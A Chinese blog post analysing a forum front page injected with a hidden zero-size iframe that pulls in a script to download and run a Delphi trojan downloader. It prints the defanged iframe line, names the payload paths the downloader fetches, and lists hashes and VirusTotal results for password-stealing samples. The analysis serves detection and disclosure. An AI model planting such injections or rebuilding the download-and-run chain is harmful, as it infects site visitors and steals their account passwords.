0
点赞
收藏
分享

微信扫一扫

某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码


endurer 原创
2006-12-15 第1

论坛首被加入代码:
/--------
<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
--------/

wm.htm 的内容为JavaScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 /mc/game/lpf.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。 

lpf.exe 采用 Borland Delphi Setup Module 制作
/-------
文件说明符 : D:/virus/lpf.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-15 20:52:52
修改时间 : 2006-12-15 20:52:54
访问时间 : 2006-12-15 0:0:0
大小 : 15872 字节 15.512 KB
MD5 : 1914ec3e09f9bca86a10034ff9b3b985
-------/
Kaspersky报为 Trojan-Downloader.Win32.Delf.ajm,瑞星报为Trojan.DL.Multi.wen

STATUS: FINISHED

Complete scanning result of "lpf.exe", received in VirusTotal at 12.15.2006, 14:28:30 (CET).

Antivirus

Version

Update

Result

AntiVir

7.3.0.15

12.15.2006

TR/Delphi.Downloader.Gen

Authentium

4.93.8

12.14.2006

Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus

Avast

4.7.892.0

12.15.2006

no virus found

AVG

386

12.15.2006

no virus found

BitDefender

7.2

12.15.2006

BehavesLike:Win32.ExplorerHijack

CAT-QuickHeal

8.00

12.14.2006

TrojanDownloader.Delf.ajm

ClamAV

devel-20060426

12.15.2006

Trojan.Downloader-51

DrWeb

4.33

12.15.2006

Trojan.DownLoader.14624

eSafe

7.0.14.0

12.14.2006

no virus found

eTrust-InoculateIT

23.73.86

12.15.2006

no virus found

eTrust-Vet

30.3.3252

12.15.2006

no virus found

Ewido

4.0

12.15.2006

Downloader.Delf.ajm

Fortinet

2.82.0.0

12.15.2006

no virus found

F-Prot

3.16f

12.14.2006

Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus

F-Prot4

4.2.1.29

12.14.2006

W32/SecRisk-ProcessPatcher-Sml-based!Maximus

Ikarus

T3.1.0.26

12.15.2006

no virus found

Kaspersky

4.0.2.24

12.15.2006

Trojan-Downloader.Win32.Delf.ajm

McAfee

4919

12.14.2006

Generic Delphi

Microsoft

1.1804

12.15.2006

no virus found

NOD32v2

1923

12.15.2006

probably a variant of Win32/TrojanDownloader.Delf.NDQ

Norman

5.80.02

12.15.2006

W32/Delf.TWZ

Panda

9.0.0.4

12.15.2006

Suspicious file

Prevx1

V2

12.15.2006

no virus found

Sophos

4.12.0

12.14.2006

no virus found

Sunbelt

2.2.907.0

11.30.2006

no virus found

TheHacker

6.0.3.132

12.14.2006

no virus found

UNA

1.83

12.14.2006

no virus found

VBA32

3.11.1

12.14.2006

no virus found

VirusBuster

4.3.19:9

12.14.2006

no virus found

Aditional Information
File size: 15872 bytes
MD5: 1914ec3e09f9bca86a10034ff9b3b985
SHA1: ad95735b4cb4ed24767801f3b3bde4823cd24281

lpf.exe会下载下列文件:
1)/mc/bao/lipengfei.exe

采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳
/-------
文件说明符 : D:/virus/lipengfei.exe
属性 : A---
获取文件版本信息大小失败!创建时间 : 2006-12-15 21:2:56
修改时间 : 2006-12-15 21:2:58
访问时间 : 2006-12-15 0:0:0
大小 : 39069 字节 38.157 KB
MD5 : 8a91fe8298abe6d136e6e4a2071abb1e
-------/
瑞星报为:Trojan.PSW.QQPass.qxf

Complete scanning result of "lipengfei.exe", received in VirusTotal at 12.15.2006, 14:39:16 (CET).

Antivirus

Version

Update

Result

AntiVir

7.3.0.15

12.15.2006

DR/Delphi.Gen

Authentium

4.93.8

12.14.2006

no virus found

Avast

4.7.892.0

12.15.2006

Win32:QQPass-EU

AVG

386

12.15.2006

PSW.Generic2.SUE

BitDefender

7.2

12.15.2006

Generic.PWStealer.A771A4B9

CAT-QuickHeal

8.00

12.14.2006

no virus found

ClamAV

devel-20060426

12.15.2006

no virus found

DrWeb

4.33

12.15.2006

Trojan.PWS.Qqpass.326

eSafe

7.0.14.0

12.14.2006

suspicious Trojan/Worm

eTrust-InoculateIT

23.73.86

12.15.2006

Win32/QQPass.Variant!Trojan

eTrust-Vet

30.3.3252

12.15.2006

no virus found

Ewido

4.0

12.15.2006

Trojan.QQPass.ra

Fortinet

2.82.0.0

12.15.2006

no virus found

F-Prot

3.16f

12.14.2006

no virus found

F-Prot4

4.2.1.29

12.14.2006

no virus found

Ikarus

T3.1.0.26

12.15.2006

Trojan-PSW.Win32.Delf.IC

Kaspersky

4.0.2.24

12.15.2006

Trojan-PSW.Win32.QQPass.ra

McAfee

4919

12.14.2006

PWS-Hook.dll

Microsoft

1.1804

12.15.2006

no virus found

NOD32v2

1923

12.15.2006

probably a variant of Win32/PSW.QQShou.EP

Norman

5.80.02

12.15.2006

W32/QQPass.CHM

Panda

9.0.0.4

12.15.2006

Suspicious file

Prevx1

V2

12.15.2006

no virus found

Sophos

4.12.0

12.14.2006

no virus found

Sunbelt

2.2.907.0

11.30.2006

no virus found

TheHacker

6.0.3.132

12.14.2006

Trojan/PSW.QQPass.ra

UNA

1.83

12.14.2006

Trojan.PSW.Win32.QQPass.6EDE

VBA32

3.11.1

12.14.2006

BackDoor.Pigeon.516

VirusBuster

4.3.19:9

12.14.2006

no virus found

Aditional Information

File size: 39069 bytes
MD5: 8a91fe8298abe6d136e6e4a2071abb1e
SHA1: 6909040f888c037999d64a32f5ef90521602ab93
packers: UPX

2)/mc/pqpq.exe
采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳
/-------
文件说明符 : D:/pe/virus/pqpq.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 0.00.0195
说明 :
版权 :
备注 :
产品版本 : 0.00.0195
产品名称 : Xcd
公司名称 : Xcd
合法商标 :
内部名称 : 23oigj
源文件名 : 23oigj.exe
创建时间 : 2006-12-15 21:3:12
修改时间 : 2006-12-15 21:3:14
访问时间 : 2006-12-15 0:0:0
大小 : 44151 字节 43.119 KB
MD5 : 04433d91f101e7c95d5d77c1cbe1efd6
-------/
瑞星报为:Trojan.PSW.Misc.kif

Complete scanning result of "pqpq.exe", received in VirusTotal at 12.15.2006, 14:47:23 (CET).

Antivirus

Version

Update

Result

AntiVir

7.3.0.15

12.15.2006

TR/PSW.Lmir.44151

Authentium

4.93.8

12.14.2006

Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus

Avast

4.7.892.0

12.15.2006

no virus found

AVG

386

12.15.2006

no virus found

BitDefender

7.2

12.15.2006

Generic.PWSLmir.D80E5DAD

CAT-QuickHeal

8.00

12.14.2006

(Suspicious) - DNAScan

ClamAV

devel-20060426

12.15.2006

no virus found

DrWeb

4.33

12.15.2006

BackDoor.Generic.1482

eSafe

7.0.14.0

12.14.2006

suspicious Trojan/Worm

eTrust-InoculateIT

23.73.86

12.15.2006

no virus found

eTrust-Vet

30.3.3252

12.15.2006

no virus found

Ewido

4.0

12.15.2006

no virus found

Fortinet

2.82.0.0

12.15.2006

Spy/WOWSTEAL

F-Prot

3.16f

12.14.2006

Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus

F-Prot4

4.2.1.29

12.14.2006

W32/Suspicious:VisualBasicMalware!Maximus

Ikarus

T3.1.0.26

12.15.2006

Backdoor.Win32.PcClient.GV

Kaspersky

4.0.2.24

12.15.2006

no virus found

McAfee

4919

12.14.2006

no virus found

Microsoft

1.1804

12.15.2006

PWS:Win32/Wowsteal.gen!A

NOD32v2

1923

12.15.2006

a variant of Win32/PSW.Legendmir

Norman

5.80.02

12.15.2006

no virus found

Panda

9.0.0.4

12.15.2006

Suspicious file

Prevx1

V2

12.15.2006

Trojan.SystemPoser

Sophos

4.12.0

12.14.2006

Mal/PWS-D

Sunbelt

2.2.907.0

11.30.2006

VIPRE.Suspicious

TheHacker

6.0.3.132

12.14.2006

no virus found

UNA

1.83

12.14.2006

no virus found

VBA32

3.11.1

12.14.2006

BackDoor.Generic.1482

VirusBuster

4.3.19:9

12.14.2006

novirus:Packed/NSPack

Aditional Information

File size: 44151 bytes
MD5: 04433d91f101e7c95d5d77c1cbe1efd6
SHA1: 26478a8cb49411d3e87132cdad2c82993bf545f2
packers: NSPACK
packers: Packed
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=cc5f62172717
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

3)/mc/gezi.exe  未能获取
4)/mc/dabao.exe 未能获取
5)/mc/xbao.exe  未能获取

保存为C:/Program Files/Common Files下的
1.exe
2.exe
3.exe
4.exe
5.exe 

与此前发现的十分相似,不过文件的MD5不同。

举报

相关推荐

0 条评论